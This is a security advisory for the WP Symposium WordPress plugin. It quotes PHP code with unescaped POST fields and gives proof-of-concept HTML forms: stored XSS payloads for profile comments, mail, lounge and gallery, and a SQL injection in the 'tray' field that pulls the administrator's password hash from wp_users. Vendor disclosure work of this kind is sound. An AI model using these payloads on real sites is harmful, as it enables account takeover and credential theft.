$_POST['text'] is not escaped.
File: wp-symposium\ajax\profile_functions.php
$uid = $_POST['uid'];
$text = $_POST['text'];
$parent = $_POST['parent'];
if (is_user_logged_in()) {
if ( ($text != __(addslashes("Write a comment..."), "wp-symposium")) && ($text != '') ) {
$wpdb->query( $wpdb->prepare( "
INSERT INTO ".$wpdb->base_prefix."symposium_comments
( subject_uid,
author_uid,
comment_parent,
comment_timestamp,
comment,
is_group
)
VALUES ( %d, %d, %d, %s, %s, %s )",
array(
$uid,
$current_user->ID,
$parent,
date("Y-m-d H:i:s"),
$text,
''
)
) );
}
$_POST['compose_text'] is not escaped.
File: wp-symposium\ajax\mail_functions.php
$subject = strip_tags($_POST['compose_subject']);
$message = $_POST['compose_text'];
$previous = $_POST['compose_previous'];
$message = $message.$previous;
// Send mail
if ( $rows_affected = $wpdb->insert( $wpdb->base_prefix . "symposium_mail", array(
'mail_from' => $current_user->ID,
'mail_to' => $recipient->ID,
'mail_sent' => date("Y-m-d H:i:s"),
'mail_subject' => $subject,
'mail_message' => $message
) ) ) {
$return = __('Message sent to', WPS_TEXT_DOMAIN).' '.$recipient->display_name;
} else {
$return = '<p><strong>'.__('There was a problem sending your mail to', WPS_TEXT_DOMAIN).' '.$recipient->display_name.'.</strong></p>';
}$_POST['comment'] is not escaped.
File: wp-symposium\ajax\lounge_functions.php
$comment = $_POST['comment'];
if ( ($comment != __(addslashes("Add a comment.."), "wp-symposium")) && ($comment != '') ) {
$wpdb->query( $wpdb->prepare( "
INSERT INTO ".$wpdb->base_prefix."symposium_lounge
( author,
added,
comment
)
VALUES ( %d, %s, %s )",
array(
$current_user->ID,
date("Y-m-d H:i:s"),
$comment
)
) );
}$_POST['name'] is not escaped.
File: wp-symposium\ajax\gallery_functions.php
$name = $_POST['name'];
$sub_album = $_POST['sub_album'];
if ($sub_album == 'true') {
$parent = $_POST['parent'];
} else {
$parent = 0;
}
// Create new album
$wpdb->query( $wpdb->prepare( "
INSERT INTO ".$wpdb->base_prefix."symposium_gallery
( parent_gid,
name,
description,
owner,
sharing,
editing,
created,
updated,
is_group
)
VALUES ( %d, %s, %s, %d, %s, %s, %s, %s, %s )",
array(
$parent,
$name,
'',
$current_user->ID,
'everyone',
'nobody',
date("Y-m-d H:i:s"),
date("Y-m-d H:i:s"),
''
)
) );$_POST['tray'] is not escaped.
File: wp-symposium\ajax\mail_functions.php
$tray = $_POST['tray'];
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");Proof of Concept
You must be logged in except lounge and gallery XSS.
Profil page XSS visible:
http://wordpress-instalation/?page_id=%profile_page_id%&uid=%user_id%<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
<input type="hidden" name="action" value="addComment">
<input type="hidden" name="parent" value="0"><br />
XSS: <input type="text" name="text" value="<script>alert(String.fromCharCode(88,83,83,50));</script>"><br />
<input type="submit" value="Add profile comment">
</form>then you must make your profile public:
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/profile_functions.php">
<input type="hidden" name="action" value="updatePersonal">
My User ID: <input type="text" name="uid"><br />
<input type="hidden" name="wall_share" value="public">
<input type="hidden" name="share" value="public">
<input type="submit" value="Make profile public">
</form>User mailbox XSS visible:
http://wordpress-instalation/?page_id=%mail_page_id%<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
<input type="hidden" name="action" value="sendMail">
Recipent User ID: <input type="text" name="compose_recipient_id"><br />
Title: <input type="text" name="compose_subject" value="My title"><br />
XSS: <input type="text" name="compose_text" value="<script>alert(String.fromCharCode(88,83,83));</script>"><br />
<input type="submit" value="Send message to another user">
</form>Lounge XSS visible:
http://wordpress-instalation/?page_id=%lounge_page_id%<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/lounge_functions.php">
<input type="hidden" name="action" value="add_comment">
XSS: <input type="text" name="comment" value="<script>alert(String.fromCharCode(88,83,83));</script>"><br />
<input type="submit" value="Add lounge post">
</form>Gallery XSS visible:
http://wordpress-instalation/?page_id=%gallery_page_id%&embed=on&album_id=%album_id%<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/gallery_functions.php">
<input type="hidden" name="action" value="create_album">
<input type="hidden" name="sub_album" value="false">
XSS: <input type="text" name="name" value="<script>alert(String.fromCharCode(88,83,83));</script>"><br />
<input type="submit" value="Create gallery">
</form>Message ID must be on of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
<input type="hidden" name="action" value="getMailMessage">
Message ID: <input type="text" name="mid"><br />
SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- "><br />
<input type="submit" value="Inject">
</form>Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
Timeline
- 22-10-2014: Discovered
- 13-11-2014: Vendor notified
- 16-11-2014: Version 14.11 released, issue resolved
